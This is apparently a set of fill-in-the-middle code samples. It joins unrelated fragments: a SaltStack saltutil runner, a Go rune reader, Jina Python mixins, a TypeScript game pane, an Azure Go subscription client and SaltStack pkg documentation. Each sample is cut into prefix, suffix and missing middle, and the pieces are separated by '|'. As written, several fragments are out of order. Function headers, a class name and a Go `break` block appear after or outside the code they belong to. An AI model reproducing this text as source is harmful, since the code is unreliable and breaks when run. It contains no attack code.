:mod:`saltutil module <salt.modules.saltutil>` for documentation on
managing updates to minions.
.. versionadded:: 2016.3.0
'''
from __future__ import absolute_import, print_function, unicode_literals
# Import python libs
import logging
# Import salt libs
import salt.utils.extmods
log = logging.getLogger(__name__) | '''
Sync all custom types
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
dictionary of modules to sync based on type
extmod_blacklist : None
dictionary of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_all
salt-run saltutil.sync_all extmod_whitelist={'runners': ['custom_runner'], 'grains': []}
'''
log.debug('Syncing all')
ret = {}
ret['clouds'] = sync_clouds(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['modules'] = sync_modules(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['states'] = sync_states(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['grains'] = sync_grains(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['renderers'] = sync_renderers(saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)
ret['returners'] = sync_returners(saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)
ret['output'] = sync_output(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['proxymodules'] = sync_proxymodules(saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)
ret['runners'] = sync_runners(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['wheel'] = sync_wheel(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['engines'] = sync_engines(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['thorium'] = sync_thorium(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['queues'] = sync_queues(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['pillar'] = sync_pillar(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['utils'] = sync_utils(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['sdb'] = sync_sdb(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['cache'] = sync_cache(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['fileserver'] = sync_fileserver(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['tops'] = sync_tops(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['tokens'] = sync_eauth_tokens(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['serializers'] = sync_serializers(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['auth'] = sync_auth(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['executors'] = sync_executors(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
return ret
def sync_auth(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync execution modules from ``salt://_auth`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_auth
'''
return salt.utils.extmods.sync(__opts__, 'auth', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_modules(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync execution modules from ``salt://_modules`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_modules
'''
return salt.utils.extmods.sync(__opts__, 'modules', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_states(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync state modules from ``salt://_states`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_states
'''
return salt.utils.extmods.sync(__opts__, 'states', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_grains(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync grains modules from ``salt://_grains`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_grains
'''
return salt.utils.extmods.sync(__opts__, 'grains', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_renderers(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
    Sync renderer modules from ``salt://_renderers`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_renderers
'''
return salt.utils.extmods.sync(__opts__, 'renderers', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_returners(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync returner modules from ``salt://_returners`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_returners
'''
return salt.utils.extmods.sync(__opts__, 'returners', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_output(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync output modules from ``salt://_output`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_output
'''
return salt.utils.extmods.sync(__opts__, 'output', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_proxymodules(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync proxy modules from ``salt://_proxy`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_proxymodules
'''
return salt.utils.extmods.sync(__opts__, 'proxy', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_runners(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync runners from ``salt://_runners`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_runners
'''
return salt.utils.extmods.sync(__opts__, 'runners', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_wheel(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync wheel modules from ``salt://_wheel`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_wheel
'''
return salt.utils.extmods.sync(__opts__, 'wheel', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_engines(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync engines from ``salt://_engines`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_engines
'''
return salt.utils.extmods.sync(__opts__, 'engines', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_thorium(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2018.3.0
Sync Thorium from ``salt://_thorium`` to the master
saltenv: ``base``
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist
comma-separated list of modules to sync
extmod_blacklist
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_thorium
'''
return salt.utils.extmods.sync(__opts__, 'thorium', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_queues(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync queue modules from ``salt://_queues`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_queues
'''
return salt.utils.extmods.sync(__opts__, 'queues', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_pillar(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync pillar modules from ``salt://_pillar`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_pillar
'''
return salt.utils.extmods.sync(__opts__, 'pillar', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_utils(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2016.11.0
Sync utils modules from ``salt://_utils`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_utils
'''
return salt.utils.extmods.sync(__opts__, 'utils', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_sdb(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2017.7.0
Sync sdb modules from ``salt://_sdb`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_sdb
'''
return salt.utils.extmods.sync(__opts__, 'sdb', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_tops(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2016.3.7,2016.11.4,2017.7.0
Sync master_tops modules from ``salt://_tops`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_tops
'''
return salt.utils.extmods.sync(__opts__, 'tops', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_cache(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2017.7.0
Sync cache modules from ``salt://_cache`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_cache
'''
return salt.utils.extmods.sync(__opts__, 'cache', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_fileserver(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2018.3.0
Sync fileserver modules from ``salt://_fileserver`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_fileserver
'''
return salt.utils.extmods.sync(__opts__, 'fileserver', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_clouds(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2017.7.0
Sync cloud modules from ``salt://_clouds`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_clouds
'''
return salt.utils.extmods.sync(__opts__, 'clouds', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_roster(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2017.7.0
Sync roster modules from ``salt://_roster`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_roster
'''
return salt.utils.extmods.sync(__opts__, 'roster', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_eauth_tokens(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2018.3.0
Sync eauth token modules from ``salt://_tokens`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_eauth_tokens
'''
return salt.utils.extmods.sync(__opts__, 'tokens', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_serializers(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2019.2.0
Sync serializer modules from ``salt://_serializers`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
        salt-run saltutil.sync_serializers
'''
return salt.utils.extmods.sync(__opts__, 'serializers', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_executors(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
.. versionadded:: 2019.2.1
Sync executor modules from ``salt://_executors`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
        comma-separated list of modules to sync
    extmod_blacklist : None
        comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_executors
'''
return salt.utils.extmods.sync(__opts__, 'executors', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0] |
def sync_all(saltenv='base', extmod_whitelist=None, extmod_blacklist=None): |
reader.go | package library
import (
"bufio"
"io"
"log"
)
// LoopRule signals to ReadRunes whether it must continue or stop
type LoopRule bool
const (
// Break ReadRunes stops on condition defined by algorithm
Break LoopRule = false
// Continue ReadRunes continues reading the runes
Continue LoopRule = true
)
// ReadRunes reads the runes from the instructions reader and applies the algorithm to the context interface
func ReadRunes(instructions io.Reader, context interface{}, algorithm func(c rune, context interface{}) LoopRule) {
r := bufio.NewReader(instructions)
for {
if c, _, err := r.ReadRune(); err != nil {
if err == io.EOF {
break
} else {
log.Fatal(err)
}
} else {
signal := algorithm(c, context)
if signal == Break |
}
}
}
| {
break
} |
mixin.py | from ..arrays import DocumentArray
from ...proto import jina_pb2
class DocsPropertyMixin:
"""Mixin class of docs property."""
@property
def docs(self) -> 'DocumentArray':
"""Get the :class: `DocumentArray` with sequence `body.docs` as content.
:return: requested :class: `DocumentArray`
"""
self.is_used = True
return DocumentArray(self.body.docs)
class GroundtruthPropertyMixin:
"""Mixin class of groundtruths property."""
@property
def groundtruths(self) -> 'DocumentArray':
"""Get the groundtruths in :class: `DocumentArray` type.
:return: requested groundtruths :class: `DocumentArray`
"""
self.is_used = True
return DocumentArray(self.body.groundtruths)
class IdsMixin:
"""Mixin class of ids property."""
@property
def ids(self):
"""Get the ids.
:return: ids
"""
return self.body.ids
class CommandMixin:
| """Mixin class of command property."""
@property
def command(self) -> str:
"""Get the command.
:return: command
"""
self.is_used = True
return jina_pb2.RequestProto.ControlRequestProto.Command.Name(
self.proto.control.command
) |
|
pane.ts | import { Immutable } from "src/utils";
import { Viseur } from "src/viseur";
import { BasePane, IPaneStat } from "src/viseur/game";
import { Game } from "./game";
import { IGameState, IPlayerState } from "./state-interfaces";
// <<-- Creer-Merge: imports -->>
// Add additional imports you need here
// <<-- /Creer-Merge: imports -->>
/**
* The visual pane that is displayed below the game and has text elements for
* each player
*/
export class | extends BasePane<IGameState, IPlayerState> {
// <<-- Creer-Merge: variables -->>
// if you need add more member class variables, do so here
// <<-- /Creer-Merge: variables -->>
/**
* Creates the pane for the Stardash game.
*
* @param viseur - The Viseur instance controlling the pane.
* @param game - The game this pane is displaying stats for.
* @param state - The initial state of the game.
*/
constructor(viseur: Viseur, game: Game, state: Immutable<IGameState>) {
super(viseur, game, state);
// <<-- Creer-Merge: constructor -->>
// constructor your pane here
// <<-- /Creer-Merge: constructor -->>
}
// <<-- Creer-Merge: public-functions -->>
// If you want to add more public functions, do so here
// <<-- /Creer-Merge: public-functions -->>
/**
* Gets the stats for the players score bars.
*
     * @param state - The current (most recent) state of the game to update this pane for.
* @returns An array of numbers, where each index is the player at that
     * index. Sum does not matter; it will resize dynamically. If you want
* to display no score, return undefined.
* An array of numbers is treated as a full bar display.
* An array of number tuples is treated as individual bars alternatively
* left and right aligned scaling from the first to the max second value.
*/
protected getPlayersScores(state: Immutable<IGameState>): Array<[number, number]> | number[] | undefined {
super.getPlayersScores(state);
// <<-- Creer-Merge: get-player-scores -->>
return state.players.map((p) => p.victoryPoints);
// <<-- /Creer-Merge: get-player-scores -->>
}
/**
* Gets the stats to show on the top bar of the pane,
* which tracks stats in the game.
* This is only called once, during initialization.
* @param state the initial state of the game
* @returns All the PaneStats to display on this BasePane for the game.
*/
protected getGameStats(state: Immutable<IGameState>): Array<IPaneStat<IGameState>> {
const stats = super.getGameStats(state);
// <<-- Creer-Merge: game-stats -->>
// add stats for games to show up here
// <<-- /Creer-Merge: game-stats -->>
return stats;
}
/**
* Gets the stats to show on each player pane, which tracks stats for that player
* @param state the initial state of the game
* @returns All the PaneStats to display on this BasePane for the player.
*/
protected getPlayerStats(state: Immutable<IGameState>): Array<IPaneStat<IPlayerState>> {
const stats = super.getPlayerStats(state);
// <<-- Creer-Merge: player-stats -->>
// add stats for players to show up here
stats.push(
{
title: "Mythicite",
icon: "diamond",
get: (player) => player.victoryPoints,
},
);
stats.push(
{
title: "Money",
icon: "money",
get: (player) => player.money,
},
);
// <<-- /Creer-Merge: player-stats -->>
return stats;
}
// <<-- Creer-Merge: functions -->>
// add more functions for your pane here
// <<-- /Creer-Merge: functions -->>
}
| Pane |
subscription.go | package subscription
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
import (
"context"
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/tracing"
"net/http"
)
// Client is the subscription client
type Client struct {
BaseClient
}
// NewClient creates an instance of the Client client.
func | () Client {
return NewClientWithBaseURI(DefaultBaseURI)
}
// NewClientWithBaseURI creates an instance of the Client client using a custom endpoint. Use this when interacting
// with an Azure cloud that uses a non-standard base URI (sovereign clouds, Azure stack).
func NewClientWithBaseURI(baseURI string) Client {
return Client{NewWithBaseURI(baseURI)}
}
// Cancel the operation to cancel a subscription
// Parameters:
// subscriptionID - subscription Id.
func (client Client) Cancel(ctx context.Context, subscriptionID string) (result CanceledSubscriptionID, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/Client.Cancel")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.CancelPreparer(ctx, subscriptionID)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Cancel", nil, "Failure preparing request")
return
}
resp, err := client.CancelSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "subscription.Client", "Cancel", resp, "Failure sending request")
return
}
result, err = client.CancelResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Cancel", resp, "Failure responding to request")
return
}
return
}
// CancelPreparer prepares the Cancel request.
func (client Client) CancelPreparer(ctx context.Context, subscriptionID string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"subscriptionId": autorest.Encode("path", subscriptionID),
}
const APIVersion = "2020-09-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Subscription/cancel", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// CancelSender sends the Cancel request. The method will close the
// http.Response Body if it receives an error.
func (client Client) CancelSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// CancelResponder handles the response to the Cancel request. The method always
// closes the http.Response Body.
func (client Client) CancelResponder(resp *http.Response) (result CanceledSubscriptionID, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// Enable the operation to enable a subscription
// Parameters:
// subscriptionID - subscription Id.
func (client Client) Enable(ctx context.Context, subscriptionID string) (result EnabledSubscriptionID, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/Client.Enable")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.EnablePreparer(ctx, subscriptionID)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Enable", nil, "Failure preparing request")
return
}
resp, err := client.EnableSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "subscription.Client", "Enable", resp, "Failure sending request")
return
}
result, err = client.EnableResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Enable", resp, "Failure responding to request")
return
}
return
}
// EnablePreparer prepares the Enable request.
func (client Client) EnablePreparer(ctx context.Context, subscriptionID string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"subscriptionId": autorest.Encode("path", subscriptionID),
}
const APIVersion = "2020-09-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Subscription/enable", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// EnableSender sends the Enable request. The method will close the
// http.Response Body if it receives an error.
func (client Client) EnableSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// EnableResponder handles the response to the Enable request. The method always
// closes the http.Response Body.
func (client Client) EnableResponder(resp *http.Response) (result EnabledSubscriptionID, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// Rename the operation to rename a subscription
// Parameters:
// subscriptionID - subscription Id.
// body - subscription Name
func (client Client) Rename(ctx context.Context, subscriptionID string, body Name) (result RenamedSubscriptionID, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/Client.Rename")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.RenamePreparer(ctx, subscriptionID, body)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Rename", nil, "Failure preparing request")
return
}
resp, err := client.RenameSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "subscription.Client", "Rename", resp, "Failure sending request")
return
}
result, err = client.RenameResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "subscription.Client", "Rename", resp, "Failure responding to request")
return
}
return
}
// RenamePreparer prepares the Rename request.
func (client Client) RenamePreparer(ctx context.Context, subscriptionID string, body Name) (*http.Request, error) {
pathParameters := map[string]interface{}{
"subscriptionId": autorest.Encode("path", subscriptionID),
}
const APIVersion = "2020-09-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsContentType("application/json; charset=utf-8"),
autorest.AsPost(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Subscription/rename", pathParameters),
autorest.WithJSON(body),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// RenameSender sends the Rename request. The method will close the
// http.Response Body if it receives an error.
func (client Client) RenameSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// RenameResponder handles the response to the Rename request. The method always
// closes the http.Response Body.
func (client Client) RenameResponder(resp *http.Response) (result RenamedSubscriptionID, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
| NewClient |
pkg.py | """
Installation of packages using OS package managers such as yum or apt-get
=========================================================================
.. note::
On minions running systemd>=205, as of version 2015.8.12, 2016.3.3, and
2016.11.0, `systemd-run(1)`_ is now used to isolate commands which modify
installed packages from the ``salt-minion`` daemon's control group. This is
done to keep systemd from killing the package manager commands spawned by
Salt, when Salt updates itself (see ``KillMode`` in the `systemd.kill(5)`_
manpage for more information). If desired, usage of `systemd-run(1)`_ can
be suppressed by setting a :mod:`config option <salt.modules.config.get>`
called ``systemd.use_scope``, with a value of ``False`` (no quotes).
.. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
.. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html
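For example, an illustrative minion configuration snippet (using the option name
quoted above) that disables this isolation would be:
.. code-block:: yaml
    systemd.use_scope: False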
Salt can manage software packages via the pkg state module, packages can be
set up to be installed, latest, removed and purged. Package management
declarations are typically rather simple:
.. code-block:: yaml
vim:
pkg.installed
A more involved example pulls packages from a custom repository.
.. code-block:: yaml
base:
pkgrepo.managed:
- name: ppa:wolfnet/logstash
- dist: precise
- file: /etc/apt/sources.list.d/logstash.list
- keyid: 28B04E4A
- keyserver: keyserver.ubuntu.com
logstash:
pkg.installed:
- fromrepo: ppa:wolfnet/logstash
Multiple packages can also be installed in a single state by passing a list to
the ``pkgs`` argument of the pkg state
.. code-block:: yaml
dotdeb.repo:
pkgrepo.managed:
- name: deb http://packages.dotdeb.org wheezy-php55 all
- dist: wheezy-php55
- file: /etc/apt/sources.list.d/dotbeb.list
- keyid: 89DF5277
- keyserver: keys.gnupg.net
- refresh_db: true
php.packages:
pkg.installed:
- fromrepo: wheezy-php55
